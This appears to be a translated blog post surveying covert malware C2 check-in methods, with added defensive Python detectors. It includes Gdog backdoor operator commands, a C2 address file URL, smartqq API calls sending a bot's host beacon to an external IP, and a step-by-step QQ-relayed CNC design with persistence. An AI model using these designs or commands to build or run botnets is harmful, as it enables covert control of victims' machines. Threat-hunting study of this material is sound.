Research notes on covert check-in methods for malware / bots / C2

catalogue

1. Traditional trojan check-in methods
2. Newer trojan check-in methods
3. QQ nickname check-in
4. QQ Zone profile check-in
5. Third-party domain check-in
6. Two-stage UDP/TCP hybrid check-in
7. Gmail CNC
8. NetBot two-step TCP handshake check-in
9. IRC Bot
10. WEBSHELL Bot
11. twittor Bot
12. Blaze Telegram Backdoor Toolkit (bt2)
13. WeChat service account Bot
14. smartqq-bot
15. P2P Bot

 

1. Traditional trojan check-in methods

0x1: Forward (active) connection

The earliest remote-control trojans all used an "active connection": the victim client listened on a preconfigured port and waited for the controller to connect. As the Internet developed further, controlling hosts on internal networks from the public Internet ran into problems, so this method gradually fell out of use.

0x2: Reverse (passive check-in)

This is the mainstream C2 bot check-in method today. A "passive connection" trojan works the other way round from an "active connection" one: the trojan, i.e. the controlled end, initiates the connection to the controller. The controller opens a listening port and the controlled end connects to the configured IP address (usually hard-coded inside the binary).
Two passive check-in variants are popular:

1. FTP/HTTP check-in: the trojan's check-in address points to a file download link on an FTP server
2. DNS resolution: the trojan's check-in address is a DNS domain name
// Both are essentially an indirection (proxy) idea: the real, constantly changing check-in IP/port is hidden behind a layer of dynamic resolution

1. Check-in via a file (ip.txt) stored on an FTP server

Write an ip.txt to the FTP server whose content is the IP address and port your controller is listening on. When your IP address changes, you only need to update the content of ip.txt. When configuring the trojan, set the check-in address in the format required by the FTP check-in mode.

2. Check-in via a file (ip.txt) stored on an HTTP server

Same principle as the FTP server method; only the network protocol differs.

http://www.tekla.pw/ip.txt

3. Check-in via domain resolution

The C2 trojan statically links a DNS resolver library into the binary and resolves the domain to obtain the current IP address at run time, just before connecting back. Because DNS is Internet infrastructure, this keeps the check-in stable while remaining easy to redirect.

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

2. Newer trojan check-in methods

The thinking behind evading network monitoring devices is easy to understand:

1. Use the common protocols of basic and public services, e.g. HTTP, for communication
2. Use two-level or multi-level proxying to decouple the point-to-point communication
3. Anti-sandbox and anti-monitoring detection techniques

Each is analysed in turn below.

 

3. QQ nickname check-in

This is a covert channel hidden inside a public service.

http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=869655938

The 大灰狼 (Dahuilang) and 猎狐 (Liehu) RATs use this check-in method (a mix of DNS, IP and QQ nickname).

After fetching the nickname of the given QQ number through the API, the trojan applies a simple decryption routine and Base64 decoding to obtain the IP:Port; the rest of the flow is the same as for a client/server bot.

portraitCallBack({"202109629":["http://qlogo2.store.qq.com/qzone/202109629/202109629/100",0,-1,0,0,0,"npmwkqr",0]})

Relevant Link:

http://drops.wooyun.org/papers/14412 

 

4. QQ Zone profile check-in

Same as the QQ nickname method: the encrypted check-in information is written to a location that can be read publicly over HTTP/API/JSON, usually social media (for stealth). For the trojan this adds one network fetch and one decryption step; everything else is the same as the traditional check-in methods.

Relevant Link:

http://blogs.360.cn/360safe/2014/08/29/cnc_trojan_and_fake_proto/

 

5. Third-party domain check-in

The third-party domain used by this kind of trojan is really a way of exploiting the fact that a third-party website lets you write, and promptly modify, your own communication data. Trojan authors usually look for well-known sites that at least will not go down, so that control over the victims persists. There are many such sites, blog platforms for instance. A blog post can be published in advance with control commands embedded in it; the specially built trojan then fetches the commands, and it can also simulate editing the post to write back the execution results.
The drawback of this approach is that bulk data transfer is not possible. Functions such as file transfer can be implemented, but the "user experience" is poor, so trojans using this check-in method are mostly used as covert backdoors that only need file download and a CMD shell.
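Sections 3 to 5 (and the ip.txt variant in section 1) all describe the same dead-drop resolver pattern: the real C2 address sits, encoded, in a public profile or post, and the implant fetches and decodes it. The defensive corollary is that a profile field which decodes to an IP:port is a strong hunting signal. The following Python is an added example written for these notes, not code from the post or from any of the RAT families it mentions. It parses a portraitCallBack JSONP response of the shape shown in section 3 and flags nicknames that Base64-decode to an IPv4:port string. The uin "10001" and its nickname are constructed test data; the extra "simple algorithm" layer the post mentions is unknown, so the example assumes plain Base64.

```python
import base64
import binascii
import json
import re

# Constructed sample response in the shape of the portraitCallBack listing above.
# uin 202109629 / nickname "npmwkqr" come from the page; uin "10001" and its
# Base64 nickname are constructed for this example.
SAMPLE_JSONP = (
    'portraitCallBack({'
    '"202109629":["http://qlogo2.store.qq.com/qzone/202109629/202109629/100",'
    '0,-1,0,0,0,"npmwkqr",0],'
    '"10001":["http://qlogo2.store.qq.com/qzone/10001/10001/100",'
    '0,-1,0,0,0,"MTAuMC4yLjE1OjQ0Mw==",0]'
    '})'
)

# IPv4 dotted quad followed by :port
IP_PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")
NICKNAME_INDEX = 6  # position of the nickname inside each portrait array


def parse_jsonp(body: str) -> dict:
    """Strip the callback(...) wrapper and return the embedded JSON object."""
    start = body.index("(") + 1
    end = body.rindex(")")
    return json.loads(body[start:end])


def extract_nicknames(body: str) -> dict:
    """Map each uin to its nickname field."""
    return {uin: fields[NICKNAME_INDEX] for uin, fields in parse_jsonp(body).items()}


def decodes_to_ip_port(text: str):
    """Return 'ip:port' when text is the Base64 of an IPv4:port string, else None."""
    try:
        raw = base64.b64decode(text, validate=True).decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    match = IP_PORT_RE.match(raw)
    if not match:
        return None
    ip, port = match.group(1), int(match.group(2))
    octets_ok = all(0 <= int(o) <= 255 for o in ip.split("."))
    return raw if octets_ok and 1 <= port <= 65535 else None


def find_suspicious_nicknames(body: str) -> dict:
    """uin -> decoded ip:port for every nickname that looks like a dead-drop value."""
    hits = {}
    for uin, nick in extract_nicknames(body).items():
        decoded = decodes_to_ip_port(nick)
        if decoded is not None:
            hits[uin] = decoded
    return hits


if __name__ == "__main__":
    print(find_suspicious_nicknames(SAMPLE_JSONP))
```

Run over responses captured at a proxy, this flags only nicknames that decode cleanly to a valid IPv4:port; a real nickname such as "npmwkqr" fails Base64 validation and is ignored. A RAT family with a custom pre-decoding layer would need that layer added in front of the Base64 step.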

Relevant Link:

http://www.freebuf.com/articles/terminal/77412.html

 

6. Two-stage UDP/TCP hybrid check-in

This resembles anti-sandbox thinking. The trojan exploits the fact that malware network sandboxes usually run in an isolated environment with no Internet access: it probes for the sandbox first, and if it detects one it hides the real C&C login behaviour, thereby evading detection by network capture.

Relevant Link:

http://www.freebuf.com/articles/system/74679.html

 

7. Gmail CNC

Gdog is a Python-based Windows backdoor that uses Gmail as its command-and-control server; its main advantage is stealth.

0x1: Features

1. Encrypted communication (AES) + SHA256 hashing
2. Unique client id generated from system information (SHA256 hash)
3. Job IDs are random SHA256 hashes
4. Retrieve system information
5. Retrieve geolocation (city, country, longitude, latitude, etc.)
6. List running processes, services, users and (hardware) devices
7. List clients
8. Execute system commands
9. Download files from the client
10. Upload files to the client
11. Execute shellcode
12. Take screenshots
13. Lock the client's screen
14. Keylogging
15. Shut down or restart the remote computer
16. Log off the current user
17. Download files from the web
18. Visit a website
19. Show a message box to the user

0x2: Setup

1. A Gmail account
2. Turn on "Allow less secure apps" in the account's security settings
3. Enable IMAP in the account settings

0x3: Bot Client

Like most bot clients, the client consists of the following main parts:

1. Collect the current host's information, encrypt it (optional) and send it to the C2 (proxied through Gmail mail)
2. C2 message parsing module
3. Function modules implementing the individual features (keylogger, screenshot, cmd, ...)

1. Check-in

The client sends its information, encrypted, to the designated Gmail account; the mail subject is the client id.

2. Command execution

The bot client periodically fetches the latest "command mail" from the Gmail mailbox, executes it and sends the result back to the mailbox. The bot client is therefore a typical decoupled architecture.

{'res': ['0;System Idle Process', '4;System', '320;smss.exe', '444;csrss.exe', '548;wininit.exe', '620;services.exe', '628;lsass.exe', '724;svchost.exe', '788;svchost.exe', '300;svchost.exe', '304;svchost.exe', '8;svchost.exe', '1060;svchost.exe', '1068;svchost.exe', '1092;svchost.exe', '1200;WUDFHost.exe', '1296;igfxCUIService.exe', '1324;svchost.exe', '1428;ibmpmsvc.exe', '1528;QQPCRTP.exe', '1732;WUDFHost.exe', '1864;WUDFHost.exe', '1852;vpnagent.exe', '2172;spoolsv.exe', '2496;svchost.exe', '2520;mDNSResponder.exe', '2528;AppleMobileDeviceService.exe', '2564;ibtsiva.exe', '2672;pcas.exe', '2708;QQProtect.exe', '2724;secbizsrv.exe', '2732;TenpayServer.exe', '2888;SynTPEnhService.exe', '2904;svchost.exe', '2988;svchost.exe', '2996;TBSecSvc.exe', '3008;TsService.exe', '3016;valWBFPolicyService.exe', '3052;vmware-authd.exe', '3060;valWbioSyncSvc.exe', '1588;vmware-usbarbitrator64.exe', '1584;vmnetdhcp.exe', '2464;vmnat.exe', '3144;wwbizsrv.exe', '3356;dasHost.exe', '3464;WmiPrvSE.exe', '3736;vmware-hostd.exe', '5664;PresentationFontCache.exe', '6492;GoogleUpdate.exe', '16084;QQMusicService.exe', '8280;OfficeClickToRun.exe', '6732;SearchIndexer.exe', '5956;dllhost.exe', '13108;csrss.exe', '16968;winlogon.exe', '12128;dwm.exe', '18876;SynTPEnh.exe', '8052;SensorDBSynch.exe', '5288;sihost.exe', '8336;conhost.exe', '7200;taskhostw.exe', '11464;igfxEM.exe', '16660;SynTPHelper.exe', '11348;explorer.exe', '19204;aliwssv.exe', '5928;conhost.exe', '10036;RemindersServer.exe', '8200;SynTPLpr.exe', '12400;SynLenovoHelper.exe', '16916;ShellExperienceHost.exe', '2664;TSVNCache.exe', '16288;RuntimeBroker.exe', '10412;SearchUI.exe', '720;SettingSyncHost.exe', '11592;QQPCTray.exe', '18176;QQPCNetFlow.exe', '12444;QQPCRealTimeSpeedup.exe', '13812;AliLangAgent.exe', '17896;AliLangClient.exe', '19792;yunpan.exe', '16812;FileEncryptionSvr.exe', '9316;alineiwai.exe', '19816;vmware-tray.exe', '18336;svchost.exe', '13660;RAVCpl64.exe', '18096;RAVBg64.exe', '10572;TXPlatform.exe', 
'12936;DingTalk.exe', '1516;DingTalk.exe', '15956;DingTalk.exe', '12768;DingTalk.exe', '15508;AliIM.exe', '16100;AliApp.exe', '11996;TaobaoProtect.exe', '7284;QQBrowser.exe', '9896;firefox.exe', '6368;QQBrowser.exe', '13520;qqbrowser.exe', '11364;chrome.exe', '17372;chrome.exe', '5124;360se.exe', '5924;chrome.exe', '9664;pycharm.exe', '17432;qqbrowser.exe', '15416;ONENOTE.EXE', '19840;360se.exe', '13364;chrome.exe', '17064;sublime_text.exe', '11028;360se.exe', '13040;qqbrowser.exe', '12556;qqbrowser.exe', '19872;qqbrowser.exe', '15204;360se.exe', '11992;cmd.exe', '16600;cmd.exe', '9052;conhost.exe', '13096;conhost.exe', '15580;360se.exe', '19172;QMChExt.exe', '12876;QMChExt.exe', '16536;qqbrowser.exe', '15424;qqbrowser.exe', '16024;ONENOTEM.EXE', '6152;fsnotifier.exe', '13480;conhost.exe', '10452;SkypeHost.exe', '13048;QQDownload.exe', '1276;editplus.exe', '6440;SystemSettingsBroker.exe', '17368;NetworkUXBroker.exe', '16404;fontdrvhost.exe', '18968;AliIM.exe', '13704;AliApp.exe', '5624;360se.exe', '15552;Xshell.exe', '7336;XshellCore.exe', '12700;filezilla.exe', '16980;chrome.exe', '896;QQMusic.exe', '20040;QQMusicExternal.exe', '20356;QQMusicExternal.exe', '19228;QQMusicIE.exe', '32;QQMusicExternal.exe', '13904;audiodg.exe', '17796;FMAPP.exe', '8104;chrome.exe', '16344;wampmanager.exe', '5512;httpd.exe', '6392;mysqld.exe', '9096;httpd.exe', '10592;ApplicationFrameHost.exe', '10556;Calculator.exe', '1056;Microsoft.Photos.exe', '17112;chrome.exe', '5044;chrome.exe', '19028;chrome.exe', '3264;SystemSettings.exe', '6984;chrome.exe', '10344;chrome.exe', '6912;360se.exe', '12344;360se.exe', '19640;QQ.exe', '1156;QQExternal.exe', '18984;qqbrowser.exe', '2596;cmd.exe', '7328;conhost.exe', '16524;360se.exe', '5888;360se.exe', '4188;360se.exe', '2748;SearchProtocolHost.exe', '10756;WmiPrvSE.exe', '18776;SearchFilterHost.exe', '9596;python.exe', '7912;conhost.exe'], 'cmd': 'tasks'}

0x4: Bot CNC

1. List currently online clients

The CNC and the bot client are fully decoupled; the CNC sees which hosts are online by reading Gmail mail.

python gdog.py -info -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

2. Send a command to a bot client and retrieve the result

python gdog.py -cmd "net user" -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

The bot client's result also comes back by mail, so the CNC has to actively "try to fetch" it.

python gdog.py -jobid 2b680930e5bd74ef9e5dca9ee8ff3fe2d20f57cfce693da341d9c10aae52065d -id b6b5164785a94ca60c6a360df4f800a45b3d3b26233443536c0acab902d0b779

gcat works the same way.

Relevant Link:

http://www.freebuf.com/sectool/105144.html
https://github.com/byt3bl33d3r/gca

 

8. NetBot two-step TCP handshake check-in

1. Bot Client -> CNC: 00000011f4000000354c6d80b0ff7600
/*
1. anti-sandbox: the real check-in packet is only sent once the C2 has been confirmed alive
2. anti-scanner: against ordinary single-exchange scanners, a C2 designed this way is somewhat harder to spot
*/
2. CNC -> Bot Client: TCP ACK
3. Bot Client -> CNC: b4b2b1b8b2b6b2b8adb1b5b3b9c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b5b1b48d84c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c29769709a92a29392b3c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1acb4b4b9b68d8a7cc2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2b1b9b4b0b1b8bab0b1b1b4b0b1b3b5c2b4b2b1b8b2b5b3b2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c2c262c2c2c2
4. Check-in succeeded
5. CNC -> Bot Client (periodic heartbeat packet): 03000000000000000000000000000000
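The anti-scanner and anti-sandbox points above (and in section 6) mean that a single banner grab never sees the real check-in: the server answers the probe with a bare ACK and only the full flow reveals the pattern. The following Python is an added example for these notes, not NetBot code or code from the post. It labels the payloads of a reassembled TCP flow and reports whether the probe, registration, heartbeat sequence listed above occurred. The probe and heartbeat bytes are the ones on the page; the registration stand-in is constructed from the first 13 bytes of the page's listing plus the 0xc2 byte that dominates the rest of it, and the "mostly one filler byte" rule is a heuristic, not a decoder.

```python
from collections import Counter

# Packet bytes transcribed from the exchange listed above (hex from the page).
PROBE_HEX = "00000011f4000000354c6d80b0ff7600"          # step 1, bot -> CNC
HEARTBEAT_HEX = "03000000000000000000000000000000"      # step 5, CNC -> bot
# Constructed stand-in for the step-3 registration payload: the first 13 bytes of
# the page's listing followed by the 0xc2 byte that dominates the real packet.
REGISTRATION_SAMPLE = bytes.fromhex("b4b2b1b8b2b6b2b8adb1b5b3b9") + b"\xc2" * 51

PROBE = bytes.fromhex(PROBE_HEX)
HEARTBEAT = bytes.fromhex(HEARTBEAT_HEX)


def dominant_byte(payload: bytes):
    """Most frequent byte value and the fraction of the payload it occupies."""
    value, count = Counter(payload).most_common(1)[0]
    return value, count / len(payload)


def classify_packet(direction: str, payload: bytes) -> str:
    """Label one TCP segment payload; direction is 'c2s' (bot -> CNC) or 's2c'."""
    if direction == "c2s" and payload == PROBE:
        return "probe"
    if direction == "s2c" and payload == HEARTBEAT:
        return "heartbeat"
    if direction == "c2s" and len(payload) >= 64:
        # Heuristic: a fixed-size record consisting mostly of one filler value
        # is typical of a zero-padded struct under single-byte obfuscation.
        _, fraction = dominant_byte(payload)
        if fraction >= 0.5:
            return "registration"
    return "other"


def detect_netbot_checkin(flow):
    """flow: ordered list of (direction, payload) for one TCP connection.

    Walks the page's sequence: probe, then (after the server's data-less ACK)
    the registration record, then server heartbeats. A scanner that sends one
    packet and reads never advances past stage 0, which is why a whole-flow
    view rather than a banner is needed to recognise this C2.
    """
    stage = 0          # 0: want probe, 1: want registration, 2: counting heartbeats
    heartbeats = 0
    labels = []
    for direction, payload in flow:
        label = classify_packet(direction, payload)
        labels.append(label)
        if stage == 0 and label == "probe":
            stage = 1
        elif stage == 1 and label == "registration":
            stage = 2
        elif stage == 2 and label == "heartbeat":
            heartbeats += 1
    return {"matched": stage == 2, "heartbeats": heartbeats, "labels": labels}


if __name__ == "__main__":
    sample_flow = [
        ("c2s", PROBE),
        ("c2s", REGISTRATION_SAMPLE),
        ("s2c", HEARTBEAT),
        ("s2c", HEARTBEAT),
    ]
    print(detect_netbot_checkin(sample_flow))
```

The detector deliberately keys on the shape of the exchange (16-byte probe, padded record, repeating 16-byte heartbeats) rather than on a decoded protocol, so it still fires if the filler byte or the obfuscation changes between builds, at the cost of needing a tuned length threshold.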

 

9. IRC Bot

IRC relay networking is used to manage the communication between the CNC and the bot clients. Cases seen in practice include:

1. PHP IRC Bot
2. Perl IRC Bot

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5215766.html
http://www.cnblogs.com/LittleHann/p/5394926.html

 

10. WEBSHELL Bot

A WEBSHELL bot is not essentially new technology; its logical architecture is the same as the gmail bot and irc bot: the client polls asynchronously for commands, posts back the execution results, and waits for the CNC to retrieve them asynchronously.

Relevant Link:

http://www.cnblogs.com/LittleHann/p/5507555.html

 

11. twittor Bot

A stealthy Python based backdoor that uses Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat which does the same but using a Gmail account.

Relevant Link:

https://github.com/PaulSec/twittor

 

12. Blaze Telegram Backdoor Toolkit (bt2)

0x1: Overview

1. Telegram

1. Cross-platform real-time messaging application
2. Supports Android, iPhone/iPad, WP, Web, PC/Mac/Linux
3. Encrypted communication: Telegram Encryption
4. Supports sending all file types
5. Open API, so custom clients can be developed

2. Bots: third-party applications built into Telegram; they communicate over HTTPS and behave like chat bots. What they can do:

1. Get customized notifications and news
2. Integrate with other services
3. Create custom tools
4. Build single- and multiplayer games
5. Build social services
6. Do virtually anything else

Relevant Link:

http://drops.wooyun.org/tips/16142 
https://blog.blazeinfosec.com/bt2-leveraging-telegram-as-a-command-control-platform/
https://github.com/nickoala/telepot
https://github.com/blazeinfosec/bt2

 

13. WeChat service account Bot

Unlike the Gmail bot, a WeChat official account or Telegram bot can implement simple "chat bot" functionality, which does away with the step of polling Gmail for mail and reduces the coding overhead for heartbeats and result return; it amounts to a simple Turing machine.

0x1: Applying for a personal WeChat service account

WeChat sets an entry bar for applicants; a service account is only issued after going through an application process.

Relevant Link:

https://www.zhihu.com/question/20492916
http://kf.qq.com/faq/120322fu63YV130422AJbaI3.html

 

14. smartqq-bot 

0x1: Installation and startup

apt-get install npm 
apt-get install node 
npm install -g smartqq-bot
nodejs /usr/local/lib/node_modules/smartqq-bot/main.js
http://114.55.36.222:3100/ 
then log in by scanning the QR code with mobile QQ

0x2: Calling the API

http://114.55.36.222:3200/send?type=[group|buddy|discuss]&to=[qqnumber/nick/gname]&msg=[msg]
http://114.55.36.222:3200/send?type=group&to=198167523&msg="test for bot"
http://114.55.36.222:3200/send?type=buddy&to=753125749&msg=hello

0x3: CNC QQ

The QQ account used to deploy the CNC is the account we logged into via QR scan through Smart QQ. A QQ-based CNC can be built along the following lines:

1. After the bot client starts it, like ordinary malware, sets up persistence (registering a service, memory injection, registry run keys, etc.) and collects local host information, e.g. windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1
2. The bot client sends the check-in information to the Proxy QQ through the Smart QQ API
http://114.55.36.222:3200/send?type=group&to=妈妈说名字长会有人粉&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1

3. The Proxy QQ (Node.js server) has two jobs
    1) forward the message to the QQ group acting as CNC; it can even start another Smart QQ instance to operate the QQ group CNC
    2) record the bot client's check-in information (operating system, bandwidth, memory, CPU core count, etc.)

4. Following the custom protocol, receive "cmd commands" from the QQ group CNC, e.g. list, and keep the received commands in an in-memory queue until the bot client fetches them
5. The bot client periodically fetches the latest "cmd command" from the Proxy QQ, executes it locally, and returns the result to the Proxy QQ through the same Smart QQ API; the Proxy QQ can store it in a backend DB and forward it to the QQ group CNC
6. That completes a full command exchange between the bot client and the CNC
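The relay in steps 2 to 5 runs over a plain HTTP API, so its access log is where a defender sees the bot traffic first. The following Python is an added example written for these notes, not smartqq-bot code or code from the post. It scans constructed access-log lines for the /send API shape shown in 0x2, URL-decodes the msg parameter and parses the pipe-delimited beacon format from step 1 into a structured record, so that check-ins can be separated from ordinary chat messages. The log lines, client addresses and timestamps are constructed; the query strings reuse the API shape and sample values on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Beacon layout from step 1 above: os|cpu|mem|<n>CPU|ver:<ver>|ip
BEACON_RE = re.compile(
    r"^(?P<os>[^|]+)\|(?P<cpu>[^|]+)\|(?P<mem>[^|]+)\|(?P<cores>\d+)CPU\|"
    r"ver:(?P<ver>[^|]+)\|(?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)
# Common-log-format request line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines for the Proxy QQ HTTP API (client IPs, times and
# sizes invented; the query strings follow the /send shape shown in the post).
SAMPLE_LOG = [
    '10.0.0.7 - - [29/May/2016:15:59:01 +0800] "GET /send?type=group&to=198167523'
    '&msg=windwos%20xp%20sp3|2GMhz|8GM|2CPU|ver:bot1.0|127.0.0.1 HTTP/1.1" 200 17',
    '10.0.0.8 - - [29/May/2016:15:59:05 +0800] "GET /send?type=buddy&to=753125749'
    '&msg=hello HTTP/1.1" 200 17',
    '10.0.0.9 - - [29/May/2016:15:59:09 +0800] "GET /favicon.ico HTTP/1.1" 404 0',
]


def parse_beacon(msg: str):
    """Split a pipe-delimited beacon into a dict, or None if the shape does not match."""
    match = BEACON_RE.match(msg)
    if not match:
        return None
    record = match.groupdict()
    record["cores"] = int(record["cores"])
    return record


def parse_send_request(target: str):
    """Extract type/to/msg from a /send request target; None for any other path."""
    parts = urlsplit(target)
    if parts.path != "/send":
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    return {key: query.get(key, [""])[0] for key in ("type", "to", "msg")}


def scan_log(lines):
    """Return one record per /send request whose msg parses as a bot beacon."""
    hits = []
    for line in lines:
        request = REQUEST_RE.search(line)
        if not request:
            continue
        send = parse_send_request(request.group("target"))
        if send is None:
            continue
        beacon = parse_beacon(send["msg"])
        if beacon is not None:
            hits.append({"type": send["type"], "to": send["to"], "beacon": beacon})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Only the first line is reported: "hello" does not match the beacon layout and the favicon request is not a /send call. In practice the beacon regex would be one of several field layouts, since the format is whatever the bot author chose, but the pipeline (request line, query string, message grammar) stays the same.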

Relevant Link: 

https://www.npmjs.com/package/smartqq-bot
https://github.com/ScienJus/qqbot
http://www.scienjus.com/webqq-analysis-1/
https://github.com/xqin/SmartQQ-for-Raspberry-Pi/blob/master/WebQQ.py
https://github.com/ScienJus/smartqq

 

15. P2P Bot

A modified variant of Zeusbot/Spyeye which uses peer-to-peer (P2P) architecture to communicate. The original Zeusbot communicated directly with its C&C server to download configuration data and upload stolen information. This was a major point of failure for the bot because the C&C server could be blocked or taken down, and the attacker would lose control of the botnet. The bot did have a fallback strategy: if the C&C server was down it generated pseudo-random domain names to contact. The attacker could of course predict those domain names and register one in order to gain back control of the bot, but the solution was not very efficient. (Terminology note: although we use the term “C&C” for the main server controlled by the attackers, this server is not a typical C&C in its functionalities, but is mainly a collector of information from the drones.)
The weakness of the traditional client/server centralized CNC bot is its centralization: if the CNC at the center of the network topology fails, then regardless of whether the bots are still alive, the botmaster has no way left to "instruct" the surviving bots to point at another CNC, because the old CNC, their only channel of communication, is gone.
A P2P network solves this problem. Bots no longer talk to the central CNC directly over TCP; they talk to all the other bots using a peer-to-peer protocol, and new bots can easily "join the network" through that protocol. The bots share a dynamic IP list among themselves (another layer of the proxy idea on top of P2P). When a C2 server fails, the operator can easily join the network and "propagate" a fresh check-in IP list so that the surviving bots reconnect. P2P thus solves the problem of how to notify the bots once the C2 CNC has failed.
To overcome these limitations the attackers have now decided to use P2P. This modified variant of Zeusbot/Spyeye contains a list of IP addresses to contact. These IPs are not servers; they are other infected clients (peers). These clients provide configuration data, which in turn contains the URL of the main C&C server. In this modified way, even if the C&C server is taken down, the P2P network remains alive and can be fuelled with a new configuration file pointing to a new URL for a new C&C server. Can the P2P network be shut down? No (at least, not easily). The IP addresses in the P2P network cannot be blocked because, in most cases, they would be normal broadband IPs (home users and work computers, for instance) and blocking them would disrupt legitimate network traffic. Also, the list of peers can update so frequently that tracking them proves difficult. Using a P2P network this way is more resistant than just a single C&C URL, and can considerably prolong a botnet’s lifetime.

0x1: How it operates

1. When run, the bot injects itself into the “explorer.exe” process, and tries to contact all the IP addresses one-by-one using UDP. This communication protocol is not complex. It can exchange several data packets with specific codes and meanings and, to identify the communications, have the peers use SHA-1 codes to keep track of the data.
2. To initiate a communication the bot sends out a “portknocking” data packet that contains a header with the SHA-1 of the infected machine and the SHA-1 of the contacted machine.
3. Every infected machine (peer) has its own unique identifier SHA-1 and every bot contains a list of SHA-1 : IP couples which represent unique hosts on the P2P network. After the portknocking packet is accepted by a peer, the reply to the portknocking includes a new list of peers (SHA-1 : IP couples again). This keeps the P2P network updated with a list of new machines.
4. More UDP packets may follow the portknocking, exchanging different data 

When the UDP communication is complete, the bot will then proceed to contact the peer through TCP. At this stage the bot can receive both a configuration file or an update of the bot itself. The decrypted configuration data contains the address of the C&C server which the bot contacts through a simple HTTP POST request. The bot then sends data about the infected machine (name of the machine and other information) to the C&C server.

0x2: Going fully P2P

With the latest update, it seems that the C&C server has disappeared entirely for this functionality. Where they were previously sending and receiving control messages to and from the C&C, these control messages are now handled by the P2P network.
This means that every peer in the botnet can act as a C&C server, while none of them really are one. Bots are now capable of downloading commands, configuration files, and executables from other bots—every compromised computer is capable of providing data to the other bots.
While these changes make the botnet more resistant to takedown, and equally more difficult to track the attackers behind it, it also provides another major benefit to the attackers.
By rebuilding the network architecture on P2P, the botnet is completely freed from the risk of a CNC node failing.

0x3: More UDP, less TCP

Another noticeable update is that communication has shifted more and more to UDP. As we have previously discussed, the bots would contact each other by using a sort of homemade UDP handshake. If successful, this would cause the bots to exchange TCP data, such as configuration files, list of other peers, etc. However, TCP communications are easy to track and dump, and the bot does not perform any authentication on the packets exchanged, so anyone can impersonate a bot and successfully communicate with other bots, downloading stuff like configuration data.
In this new strain, the data exchange is also now happening in UDP. Given the stateless nature of this protocol, it is more difficult to capture and extract data from bot communications.
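The resilience argument in this section (a centralized CNC is a single point of failure, while a peer list survives a C&C takedown) is a graph-reachability property, and it is worth seeing why blocking the server alone achieves nothing. The following Python is an added simulation written for these notes; it is not Zeusbot code, not from the Symantec analysis and not from the post, and it models nothing about the real UDP protocol. It builds a toy centralized topology and a toy peer topology (a ring plus random extra peer entries, both constructed), then measures what fraction of live bots a new configuration reaches once the C&C node, or a set of sinkholed peers, is offline.

```python
import random
from collections import deque

CNC = "cnc"  # the single collector/C&C node in the centralized model


def build_centralized(n_bots: int) -> dict:
    """Every bot knows only the C&C; bots do not know each other."""
    adj = {i: {CNC} for i in range(n_bots)}
    adj[CNC] = set(range(n_bots))
    return adj


def build_p2p(n_bots: int, extra_links: int, seed: int = 7) -> dict:
    """Constructed peer topology: a ring (keeps it connected) plus random extra links."""
    rng = random.Random(seed)
    adj = {i: set() for i in range(n_bots)}
    for i in range(n_bots):
        j = (i + 1) % n_bots
        adj[i].add(j)
        adj[j].add(i)
    for _ in range(extra_links):
        a, b = rng.sample(range(n_bots), 2)
        adj[a].add(b)
        adj[b].add(a)
    return adj


def reachable(adj: dict, start, dead=frozenset()) -> set:
    """Nodes a message injected at `start` reaches while `dead` nodes are offline."""
    if start in dead:
        return set()
    seen = {start}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        for nxt in adj[node]:
            if nxt not in dead and nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    return seen


def fraction_reached(adj: dict, start, dead=frozenset()) -> float:
    """Share of live bots (the C&C node excluded) that a new config reaches."""
    live = [n for n in adj if n != CNC and n not in dead]
    hit = reachable(adj, start, dead) - {CNC}
    return len(hit) / len(live) if live else 0.0


def centralized_after_takedown(n_bots: int) -> float:
    """The operator's only channel was the C&C; with it dead nothing is reachable."""
    return fraction_reached(build_centralized(n_bots), CNC, dead=frozenset({CNC}))


def p2p_after_takedown(n_bots: int, extra_links: int, entry: int, sinkholed=()) -> float:
    """The operator re-enters through any live peer; sinkholed peers are offline."""
    return fraction_reached(build_p2p(n_bots, extra_links), entry, dead=frozenset(sinkholed))


if __name__ == "__main__":
    print("centralized, C&C down:", centralized_after_takedown(20))
    print("p2p, C&C down:", p2p_after_takedown(20, 10, entry=0))
    print("p2p, two peers sinkholed:", p2p_after_takedown(20, 10, entry=0, sinkholed=(5, 6)))
```

The numbers make the section's point concrete: in the centralized model a dead C&C means zero reach, whereas in the peer model removing the server changes nothing and even knocking out individual peers leaves the rest reachable as long as the remaining graph stays connected. For a defender this says where effort has to go: a takedown that does not also disrupt the peer list (for instance by sinkholing enough peers to partition the graph) leaves the network fully controllable.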

Relevant Link:

http://www.symantec.com/connect/blogs/cracking-new-p2p-variant-zeusbotspyeye

 

Copyright (c) 2016 LittleHann All rights reserved

 

posted @ 2016-05-29 15:59 by 郑瀚Andrew